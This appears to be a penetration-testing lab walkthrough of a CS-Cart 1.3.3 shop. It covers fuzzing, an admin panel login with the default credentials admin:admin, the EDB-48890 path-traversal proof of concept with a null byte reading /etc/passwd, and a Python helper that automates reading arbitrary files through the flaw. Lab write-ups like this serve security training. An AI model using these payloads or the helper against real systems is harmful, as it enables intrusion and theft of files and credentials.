Web


Nmap discovered a web server on target port 80. The banner identifies Apache/2.2.4 (Ubuntu) with PHP/5.2.3-1ubuntu6, both long end-of-life. Note also the Set-Cookie headers below: the session cookie csid and the cart_* cookies are issued without HttpOnly or Secure flags.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/payday]
└─$ curl -I http://$IP/                                                        
HTTP/1.1 200 OK
Date: Sat, 08 Feb 2025 20:11:34 GMT
Server: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6
X-Powered-By: PHP/5.2.3-1ubuntu6
Expires: -1
Last-Modified: Sat, 08 Feb 2025 20:11:34 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: csid=31f41023c7083a60ca3aa1377b4c95a2; expires=Sat, 08-Feb-2025 22:11:34 GMT; path=/; domain=.192.168.198.39
Set-Cookie: csid=31f41023c7083a60ca3aa1377b4c95a2; path=/; domain=.192.168.198.39
Set-Cookie: cart_languageC=EN; domain=.192.168.198.39
Set-Cookie: cart_languageC=EN; domain=.192.168.198.39
Set-Cookie: secondary_currencyC=usd; domain=.192.168.198.39
Set-Cookie: secondary_currencyC=usd; domain=.192.168.198.39
Content-Type: text/html

Webroot


The landing page presents itself as a demo online shop built on an application called CS-Cart.

Fuzzing


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/payday]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt  -u http://$IP/FUZZ -ic
________________________________________________
 :: Method           : GET
 :: URL              : http://192.168.198.39/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
.htaccess               [Status: 403, Size: 309, Words: 22, Lines: 11, Duration: 23ms]
Thumbs.db               [Status: 200, Size: 1, Words: 1, Lines: 2, Duration: 18ms]
addons                  [Status: 301, Size: 335, Words: 21, Lines: 10, Duration: 19ms]
admin                   [Status: 200, Size: 9483, Words: 393, Lines: 263, Duration: 52ms]
.htpasswd               [Status: 403, Size: 309, Words: 22, Lines: 11, Duration: 2161ms]
apache2-default         [Status: 301, Size: 344, Words: 21, Lines: 10, Duration: 18ms]
catalog                 [Status: 301, Size: 336, Words: 21, Lines: 10, Duration: 19ms]
cgi-bin/                [Status: 403, Size: 308, Words: 22, Lines: 11, Duration: 20ms]
chart                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 84ms]
classes                 [Status: 301, Size: 336, Words: 21, Lines: 10, Duration: 21ms]
config                  [Status: 200, Size: 13, Words: 2, Lines: 1, Duration: 28ms]
core                    [Status: 301, Size: 333, Words: 21, Lines: 10, Duration: 20ms]
images                  [Status: 301, Size: 335, Words: 21, Lines: 10, Duration: 19ms]
image                   [Status: 200, Size: 1971, Words: 16, Lines: 12, Duration: 47ms]
include                 [Status: 301, Size: 336, Words: 21, Lines: 10, Duration: 20ms]
init                    [Status: 200, Size: 13, Words: 2, Lines: 1, Duration: 19ms]
index                   [Status: 200, Size: 28074, Words: 1558, Lines: 676, Duration: 87ms]
install                 [Status: 200, Size: 7731, Words: 346, Lines: 220, Duration: 35ms]
payments                [Status: 301, Size: 337, Words: 21, Lines: 10, Duration: 19ms]
prepare                 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 21ms]
server-status           [Status: 403, Size: 313, Words: 22, Lines: 11, Duration: 21ms]
shippings               [Status: 301, Size: 338, Words: 21, Lines: 10, Duration: 19ms]
skins                   [Status: 301, Size: 334, Words: 21, Lines: 10, Duration: 18ms]
targets                 [Status: 301, Size: 336, Words: 21, Lines: 10, Duration: 20ms]
var                     [Status: 301, Size: 332, Words: 21, Lines: 10, Duration: 21ms]
:: Progress: [20478/20478] :: Job [1/1] :: 1980 req/sec :: Duration: [0:00:13] :: Errors: 0 ::

Many endpoints are exposed. The ones worth a closer look are checked below.

config


N/A

init


N/A

install


The /install endpoint still serves the installation wizard, which should have been removed after setup. It leaks the application version: CS-Cart 1.3.3.

classes


Directory listing is enabled here

admin


Testing the default/weak credential pair admin:admin

Authenticated. The default credentials work on the admin panel.

Vulnerabilities


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/payday]
└─$ searchsploit CS-Cart    
-------------------------------------------------------- ---------------------------------
 Exploit Title                                          |  Path
-------------------------------------------------------- ---------------------------------
CS-Cart - Multiple SQL Injections                       | php/webapps/27030.txt
CS-Cart 1.3.2 - 'index.php' Cross-Site Scripting        | php/webapps/31443.txt
CS-Cart 1.3.3 - 'classes_dir' LFI                       | php/webapps/48890.txt
CS-Cart 1.3.3 - 'classes_dir' Remote File Inclusion     | php/webapps/1872.txt
CS-Cart 1.3.3 - 'install.php' Cross-Site Scripting      | multiple/webapps/14962.txt
CS-Cart 1.3.3 - authenticated RCE                       | php/webapps/48891.txt
CS-Cart 1.3.5 - Authentication Bypass                   | php/webapps/6352.txt
CS-Cart 2.0.0 Beta 3 - 'Product_ID' SQL Injection       | php/webapps/8184.txt
CS-Cart 2.0.5 - 'reward_points.post.php' SQL Injection  | php/webapps/33146.txt
CS-Cart 2.2.1 - 'products.php' SQL Injection            | php/webapps/36093.txt
CS-Cart 4.2.4 - Cross-Site Request Forgery              | php/webapps/36358.html
CS-Cart 4.3.10 - XML External Entity Injection          | php/webapps/40770.txt
-------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

With the version pinned to 1.3.3, several of the listed exploits apply directly: the 'classes_dir' LFI and RFI (48890, 1872) and an authenticated RCE (48891), the latter relevant given that admin:admin already works.

LFI


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/payday]
└─$ searchsploit -x php/webapps/48890.txt
  Exploit: CS-Cart 1.3.3 - 'classes_dir' LFI
      URL: https://www.exploit-db.com/exploits/48890
     Path: /usr/share/exploitdb/exploits/php/webapps/48890.txt
    Codes: N/A
 Verified: False
File Type: ASCII text
 
# Exploit Title: CS-Cart unauthenticated LFI
# Date: 2020-09-22
# Exploit Author:  0xmmnbassel
# Vendor Homepage: https://www.cs-cart.com/e-commerce-platform.html
# Tested at: ver. 1.3.4
# Vulnerability Type: unauthenticated LFI
 
 
http://www.site.com/[CS-Cart_path]/classes/phpmailer/class.cs_phpmailer.php?classes_dir=[evil_scripts]%00
example:
http://www.site.com/[CS-Cart_path]/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00
http://www.site.com/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00

One of these, 48890, targets an unauthenticated LFI through the classes_dir parameter of class.cs_phpmailer.php. The PoC was written against 1.3.4, so it is tried directly against this 1.3.3 target:

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/payday]
└─$ curl -s http://$IP/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:100:101::/nonexistent:/bin/false
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
dovecot:x:104:111:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
postfix:x:105:112::/var/spool/postfix:/bin/false
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
patrick:x:1000:1000:patrick,,,:/home/patrick:/bin/bash
<br />
<b>Fatal error</b>:  Class 'PHPMailer' not found in <b>/var/www/classes/phpmailer/class.cs_phpmailer.php</b> on line <b>6</b><br />

LFI confirmed. The %00 terminator works because PHP 5.2.3 still honours null bytes in include paths (that was only fixed in PHP 5.3.4), so whatever CS-Cart appends after classes_dir is discarded. The trailing "Class 'PHPMailer' not found" fatal error is expected: /etc/passwd was included in place of the mailer class file, so its contents are echoed and the script then dies on line 6. Any file readable by www-data can be retrieved the same way.
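The following helper wraps the classes_dir LFI shown above so that arbitrary files can be pulled and the appended PHP fatal error stripped off. It is an added example, not code from the walkthrough, from EDB-48890 or from CS-Cart. It assumes only what the page shows: the include is reachable at /classes/phpmailer/class.cs_phpmailer.php, the parameter is classes_dir, eleven ../ levels suffice, and a trailing %00 truncates the appended filename (PHP < 5.3.4). The HTTP call sits behind a fetch callable so the parsing can be exercised offline against a constructed response; the sample body below is constructed from the shape of the output on this page, not captured.

```python
"""Read files through the CS-Cart 1.3.3 'classes_dir' LFI and parse /etc/passwd.

Added example (not from the walkthrough, EDB-48890 or CS-Cart). Assumptions:
the vulnerable script path, the classes_dir parameter and null-byte truncation
are exactly as demonstrated on the page above.
"""
import re
import urllib.parse
import urllib.request

LFI_PATH = "/classes/phpmailer/class.cs_phpmailer.php"
TRAVERSAL = "../" * 11          # depth used by the public PoC; more is harmless
FATAL_RE = re.compile(r"<br\s*/?>\s*<b>Fatal error</b>")
NOLOGIN = {"/bin/false", "/usr/sbin/nologin", "/sbin/nologin", "/bin/sync"}


def build_lfi_url(base, target):
    """Build the LFI URL for an absolute path on the target filesystem.

    quote() turns the NUL byte into %00 and leaves '/' and '.' alone, so the
    traversal sequence reaches the server intact.
    """
    payload = TRAVERSAL + target.lstrip("/") + "\x00"
    return base.rstrip("/") + LFI_PATH + "?classes_dir=" + urllib.parse.quote(payload)


def strip_php_error(body):
    """Drop the PHP fatal error the target appends after the included file."""
    m = FATAL_RE.search(body)
    return body if m is None else body[: m.start()]


def read_file(base, target, fetch=None):
    """Fetch a file through the LFI and return its text without the PHP error.

    fetch(url) -> str is injectable so the function can be tested offline.
    """
    url = build_lfi_url(base, target)
    if fetch is None:
        def fetch(u):
            with urllib.request.urlopen(u, timeout=10) as resp:
                return resp.read().decode("utf-8", "replace")
    return strip_php_error(fetch(url))


def login_users(passwd_text):
    """Return (name, uid, home, shell) for root and non-system accounts with a real shell.

    These are the SSH / su candidates a pentester wants out of /etc/passwd.
    """
    users = []
    for line in passwd_text.splitlines():
        parts = line.split(":")
        if len(parts) != 7:
            continue                       # skip HTML debris or blank lines
        name, _, uid, _, _, home, shell = parts
        uid = int(uid)
        if (uid == 0 or uid >= 1000) and shell not in NOLOGIN:
            users.append((name, uid, home, shell))
    return users


# Constructed sample response mirroring the shape of the real output above
# (file contents followed by the PHP fatal error); not a capture.
SAMPLE_RESPONSE = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/bin/sh\n"
    "www-data:x:33:33:www-data:/var/www:/bin/sh\n"
    "mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false\n"
    "sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin\n"
    "patrick:x:1000:1000:patrick,,,:/home/patrick:/bin/bash\n"
    "<br />\n"
    "<b>Fatal error</b>:  Class 'PHPMailer' not found in "
    "<b>/var/www/classes/phpmailer/class.cs_phpmailer.php</b> on line <b>6</b><br />\n"
)


def demo():
    """Run the full pipeline offline against the constructed response."""
    text = read_file("http://192.168.198.39", "/etc/passwd", fetch=lambda url: SAMPLE_RESPONSE)
    return login_users(text)


if __name__ == "__main__":
    for name, uid, home, shell in demo():
        print(f"{name:10} uid={uid:<5} {home} {shell}")
```

Against the live target, `read_file("http://192.168.198.39", "/etc/passwd")` with no fetch argument performs the real request; the traversal depth and null byte are the only exploit-specific parts, so the same helper reads any other file www-data can open.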